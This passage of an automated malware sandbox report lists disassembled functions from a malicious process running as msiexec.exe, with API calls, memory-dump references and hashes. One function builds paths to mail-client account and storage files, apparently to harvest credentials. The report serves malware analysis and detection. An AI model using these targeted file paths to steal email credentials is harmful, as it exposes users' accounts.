                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21BD165A
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21BD1661
                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21BD1686
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1922816806-0
                                                                                                    • Opcode ID: c5befa2b9c241ba8891af6150ecd17d4037055b18309ec104eaabbfc413ade1e
                                                                                                    • Instruction ID: 48e8d3403a1482571ae2f7bfa00c38df8cf74b915a0c937fc6ce928537c1e9b6
                                                                                                    • Opcode Fuzzy Hash: c5befa2b9c241ba8891af6150ecd17d4037055b18309ec104eaabbfc413ade1e
                                                                                                    • Instruction Fuzzy Hash: A0218337900205ABDB0CDF64DC95AEE77B8EF8D710F24842AE504AB181EB74A94687A5
                                                                                                    Function 21BD1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21BD1038
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21BD104B
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21BD1061
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21BD1075
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21BD1090
                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 21BD10B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3594823470-0
                                                                                                    • Opcode ID: 1e348f86aff297a2f1922bca88ddf2e5318f12288c12993e03a5f19373a825b1
                                                                                                    • Instruction ID: fb619b4d202efb57b24c1868b43eee0529ae114a47ccfbcc785bcd4511d3448a
                                                                                                    • Opcode Fuzzy Hash: 1e348f86aff297a2f1922bca88ddf2e5318f12288c12993e03a5f19373a825b1
                                                                                                    • Instruction Fuzzy Hash: B1218176A003199BCF1CEB60DC58EDB377CEF8D314F104696E959971A1DA319A86CB80
                                                                                                    Function 21BD3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,21BD3518,21BD23F1,21BD1F17), ref: 21BD3864
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21BD3872
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 21BD388B
                                                                                                    • SetLastError.KERNEL32(00000000,?,21BD3518,21BD23F1,21BD1F17), ref: 21BD38DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 76f4d5a3f2fadc6c474a30823ad0c107580e81f037945402e00a5551fcf46b50
                                                                                                    • Instruction ID: 0a8dcf0030481201d1f4fca9afcfb1e4172afa0ef214f4b069ee2d5c82f517a2
                                                                                                    • Opcode Fuzzy Hash: 76f4d5a3f2fadc6c474a30823ad0c107580e81f037945402e00a5551fcf46b50
                                                                                                    • Instruction Fuzzy Hash: 4201F7B36497126EAA0E96797CC6A072FB4DF5E7B5B200339E1149A0F3EF5748018354
                                                                                                    Function 21BD5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,21BD6C6C), ref: 21BD5AFA
                                                                                                    • _free.LIBCMT ref: 21BD5B2D
                                                                                                    • _free.LIBCMT ref: 21BD5B55
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,21BD6C6C), ref: 21BD5B62
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,21BD6C6C), ref: 21BD5B6E
                                                                                                    • _abort.LIBCMT ref: 21BD5B74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: c411e84a23e6b0e7ded4e5840efa9ded9e730f369a1bbe73c575885a6e087cc5
                                                                                                    • Instruction ID: cd3e863ec5f396a7ec186fe2029c208d96fd2037f51bc372bfaf7e0ec29ee849
                                                                                                    • Opcode Fuzzy Hash: c411e84a23e6b0e7ded4e5840efa9ded9e730f369a1bbe73c575885a6e087cc5
                                                                                                    • Instruction Fuzzy Hash: 20F0A433544902BFD60EEA346C48F0A2A7ACFDFB71F250124F914D7191EE2989024764
                                                                                                    Function 21BD11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1E9A
                                                                                                      • Part of subcall function 21BD1E89: lstrcatW.KERNEL32(?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EAC
                                                                                                      • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EB3
                                                                                                      • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EC8
                                                                                                      • Part of subcall function 21BD1E89: lstrcatW.KERNEL32(?,21BD10DF,?,21BD10DF,?,?,?,00000000), ref: 21BD1ED3
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21BD122A
                                                                                                      • Part of subcall function 21BD173A: _strlen.LIBCMT ref: 21BD1855
                                                                                                      • Part of subcall function 21BD173A: _strlen.LIBCMT ref: 21BD1869
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                    • Opcode ID: 96607d1b892a217e29e001c56e79e6aa4d96b87b408ab404bd118bfc9b823be6
                                                                                                    • Instruction ID: 7e0dbfac9da6877cb9709c139d4478ac8a8e25b92281d8fee11be9fba9630d92
                                                                                                    • Opcode Fuzzy Hash: 96607d1b892a217e29e001c56e79e6aa4d96b87b408ab404bd118bfc9b823be6
                                                                                                    • Instruction Fuzzy Hash: 0121B1BAE102086AEB1CDBA0EC91FEE7339EF98714F500546F604EB1D0E6B11D818758
                                                                                                    Function 21BD4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21BD4AEA,?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000), ref: 21BD4B59
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21BD4B6C
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,21BD4AEA,?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082), ref: 21BD4B8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: d815b29370a022e3fee65b0f0c8693460ba21b0a0c9b8283ee40ae527108bd35
                                                                                                    • Instruction ID: 91f65ec2bfb977834a9915157bb3175896655d7daa0423858721dfad7a33c63a
                                                                                                    • Opcode Fuzzy Hash: d815b29370a022e3fee65b0f0c8693460ba21b0a0c9b8283ee40ae527108bd35
                                                                                                    • Instruction Fuzzy Hash: 83F03C32940108AFDB1D9FA1C818BAEBFB9EF4A251F4041A8E945A7190DB369941CB91
                                                                                                    Function 21BD7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 21BD715C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21BD717F
                                                                                                      • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21BD71A5
                                                                                                    • _free.LIBCMT ref: 21BD71B8
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21BD71C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 2040ee23e8656eee6c5250ec4a9f0dd4cae0f46830b8a149e4dbde54ed763260
                                                                                                    • Instruction ID: bd192166ac2a385a42e0bedca81319b9cd9f8237d93b00dbe872ba06156609de
                                                                                                    • Opcode Fuzzy Hash: 2040ee23e8656eee6c5250ec4a9f0dd4cae0f46830b8a149e4dbde54ed763260
                                                                                                    • Instruction Fuzzy Hash: C70152776022557F271D8AB75C5CDBB6E7EDEC7AA4711036DF904C7640DA658C01C2B0
                                                                                                    Function 21BD5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,21BD636D,21BD5713,00000000,?,21BD2249,?,?,21BD1D66,00000000,?,?,00000000), ref: 21BD5B7F
                                                                                                    • _free.LIBCMT ref: 21BD5BB4
                                                                                                    • _free.LIBCMT ref: 21BD5BDB
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD5BE8
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD5BF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: ed5bd502c5bb4f05e9110e994cf17a683d5dc9762272b887435d98834c59e59b
                                                                                                    • Instruction ID: 338a897303256edb73d0a65af3a46a30e6f8d8e819da929ddcd2066a8e1f457f
                                                                                                    • Opcode Fuzzy Hash: ed5bd502c5bb4f05e9110e994cf17a683d5dc9762272b887435d98834c59e59b
                                                                                                    • Instruction Fuzzy Hash: DA01F437145602BB970FEE345C94E1B2E7EDFCF6B1B610128F855D31A2EE69C9024B60
                                                                                                    Function 21BD1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1E9A
                                                                                                    • lstrcatW.KERNEL32(?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EAC
                                                                                                    • lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EB3
                                                                                                    • lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EC8
                                                                                                    • lstrcatW.KERNEL32(?,21BD10DF,?,21BD10DF,?,?,?,00000000), ref: 21BD1ED3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 493641738-0
                                                                                                    • Opcode ID: edae078839af56656c965a69e5de8f72883e88c394b44c30ea0b4096bd3bb6fa
                                                                                                    • Instruction ID: 8a9ffad04394ecbdedc83c7a1aa5a0383009d34cd0ec6aaa4d9c7c89822cd63c
                                                                                                    • Opcode Fuzzy Hash: edae078839af56656c965a69e5de8f72883e88c394b44c30ea0b4096bd3bb6fa
                                                                                                    • Instruction Fuzzy Hash: 52F089275401107BE6296759EC95E7F7B7CEFCBB60F04441DF60C83190DB55584293B5
                                                                                                    Function 21BD91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD91D0
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD91E2
                                                                                                    • _free.LIBCMT ref: 21BD91F4
                                                                                                    • _free.LIBCMT ref: 21BD9206
                                                                                                    • _free.LIBCMT ref: 21BD9218
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 71434db9813ea855e06bd112a1745eb155a0889b017f7da95136c5bc5803d0fb
                                                                                                    • Instruction ID: 572d4642c0dd9a451c6e2cccc09464a423bb3cb36d945502e52dea2746bf7feb
                                                                                                    • Opcode Fuzzy Hash: 71434db9813ea855e06bd112a1745eb155a0889b017f7da95136c5bc5803d0fb
                                                                                                    • Instruction Fuzzy Hash: 76F06D73594240AB9A1CDF69E6C4C1B7FF9EF29720BA1180DF909D7524CB34F8808B60
                                                                                                    Function 21BD5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD536F
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD5381
                                                                                                    • _free.LIBCMT ref: 21BD5394
                                                                                                    • _free.LIBCMT ref: 21BD53A5
                                                                                                    • _free.LIBCMT ref: 21BD53B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: c073cfe1817b526d0ae269f61ce3d2138c7ae4f788f54444e6e4fbf8a0e2ceab
                                                                                                    • Instruction ID: e8ef2da5110057480655eaaaf6771c8295eeeb857ffc442d0635c08e6537c877
                                                                                                    • Opcode Fuzzy Hash: c073cfe1817b526d0ae269f61ce3d2138c7ae4f788f54444e6e4fbf8a0e2ceab
                                                                                                    • Instruction Fuzzy Hash: 4CF0DA729A5225DF8E0DAF25D98080A3FB5FF2DB20792128AF81197374DB7949429BC1
                                                                                                    Function 21BD4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 21BD4C1D
                                                                                                    • _free.LIBCMT ref: 21BD4CE8
                                                                                                    • _free.LIBCMT ref: 21BD4CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Windows\System32\msiexec.exe
                                                                                                    • API String ID: 2506810119-1382325751
                                                                                                    • Opcode ID: 4ed82afa263f87d84898ec359a9163258c77b58840b3dc0206bb1a069f8e9110
                                                                                                    • Instruction ID: e2c35f4b35aa0ce74d7afaf48dcb7a4fd460543c80607d2d83cd52fd47e79856
                                                                                                    • Opcode Fuzzy Hash: 4ed82afa263f87d84898ec359a9163258c77b58840b3dc0206bb1a069f8e9110
                                                                                                    • Instruction Fuzzy Hash: AC31B272A40209EFDB1DDFA9C880D9FBBFCEF99310F14416AE94497610D7718A41CB90
                                                                                                    Function 21BD86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21BD6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 21BD8731
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 21BD87BA
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 21BD87CC
                                                                                                    • __freea.LIBCMT ref: 21BD87D5
                                                                                                      • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: cca392908f3b6c025a4796990797c6ce8e1c5fc23e184443cd9cff5ed741aab1
                                                                                                    • Instruction ID: f031a5bad4074c253fba2e74c92e4701913d8d943930ea277960dc347d1b617c
                                                                                                    • Opcode Fuzzy Hash: cca392908f3b6c025a4796990797c6ce8e1c5fc23e184443cd9cff5ed741aab1
                                                                                                    • Instruction Fuzzy Hash: DC317C72A0121AABDF1DCF64CC84EAF7BB6EF45711F064268ED08971A0E735D961CB90
                                                                                                    Function 21BDC7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(21BDC7DD), ref: 21BDC7E6
                                                                                                    • GetModuleHandleA.KERNEL32(?,21BDC7DD), ref: 21BDC838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 21BDC860
                                                                                                      • Part of subcall function 21BDC803: GetProcAddress.KERNEL32(00000000,21BDC7F4), ref: 21BDC804
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1646373207-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: dc799d153cace5a92900d57fd9c0987d3e5963e4029e45ca7771ea3f467d9e4b
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: 9101D61394524A7CBA1DD6744C03DBA9FF8DB2B673B10175EE240C71A3D9A38506C3A6
                                                                                                    Function 21BD5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21BD1D66,00000000,00000000,?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue), ref: 21BD5D13
                                                                                                    • GetLastError.KERNEL32(?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue,21BDE190,FlsSetValue,00000000,00000364,?,21BD5BC8), ref: 21BD5D1F
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue,21BDE190,FlsSetValue,00000000), ref: 21BD5D2D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: e35fca360ca27df356efa427df3bde30081f217e7072dc616d7419eed8a440b4
                                                                                                    • Instruction ID: 5748a8cee1b8f225ccbb0748c9b408d484f6345075d57c752ad9949460d88c4e
                                                                                                    • Opcode Fuzzy Hash: e35fca360ca27df356efa427df3bde30081f217e7072dc616d7419eed8a440b4
                                                                                                    • Instruction Fuzzy Hash: 2F01F737681222ABD31D8E688C5CE463B7CEF476E1B100624FA49D7190DB25D802CBF0
                                                                                                    Function 21BD63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD655C
                                                                                                      • Part of subcall function 21BD62BC: IsProcessorFeaturePresent.KERNEL32(00000017,21BD62AB,00000000,?,?,?,?,00000016,?,?,21BD62B8,00000000,00000000,00000000,00000000,00000000), ref: 21BD62BE
                                                                                                      • Part of subcall function 21BD62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 21BD62E0
                                                                                                      • Part of subcall function 21BD62BC: TerminateProcess.KERNEL32(00000000), ref: 21BD62E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
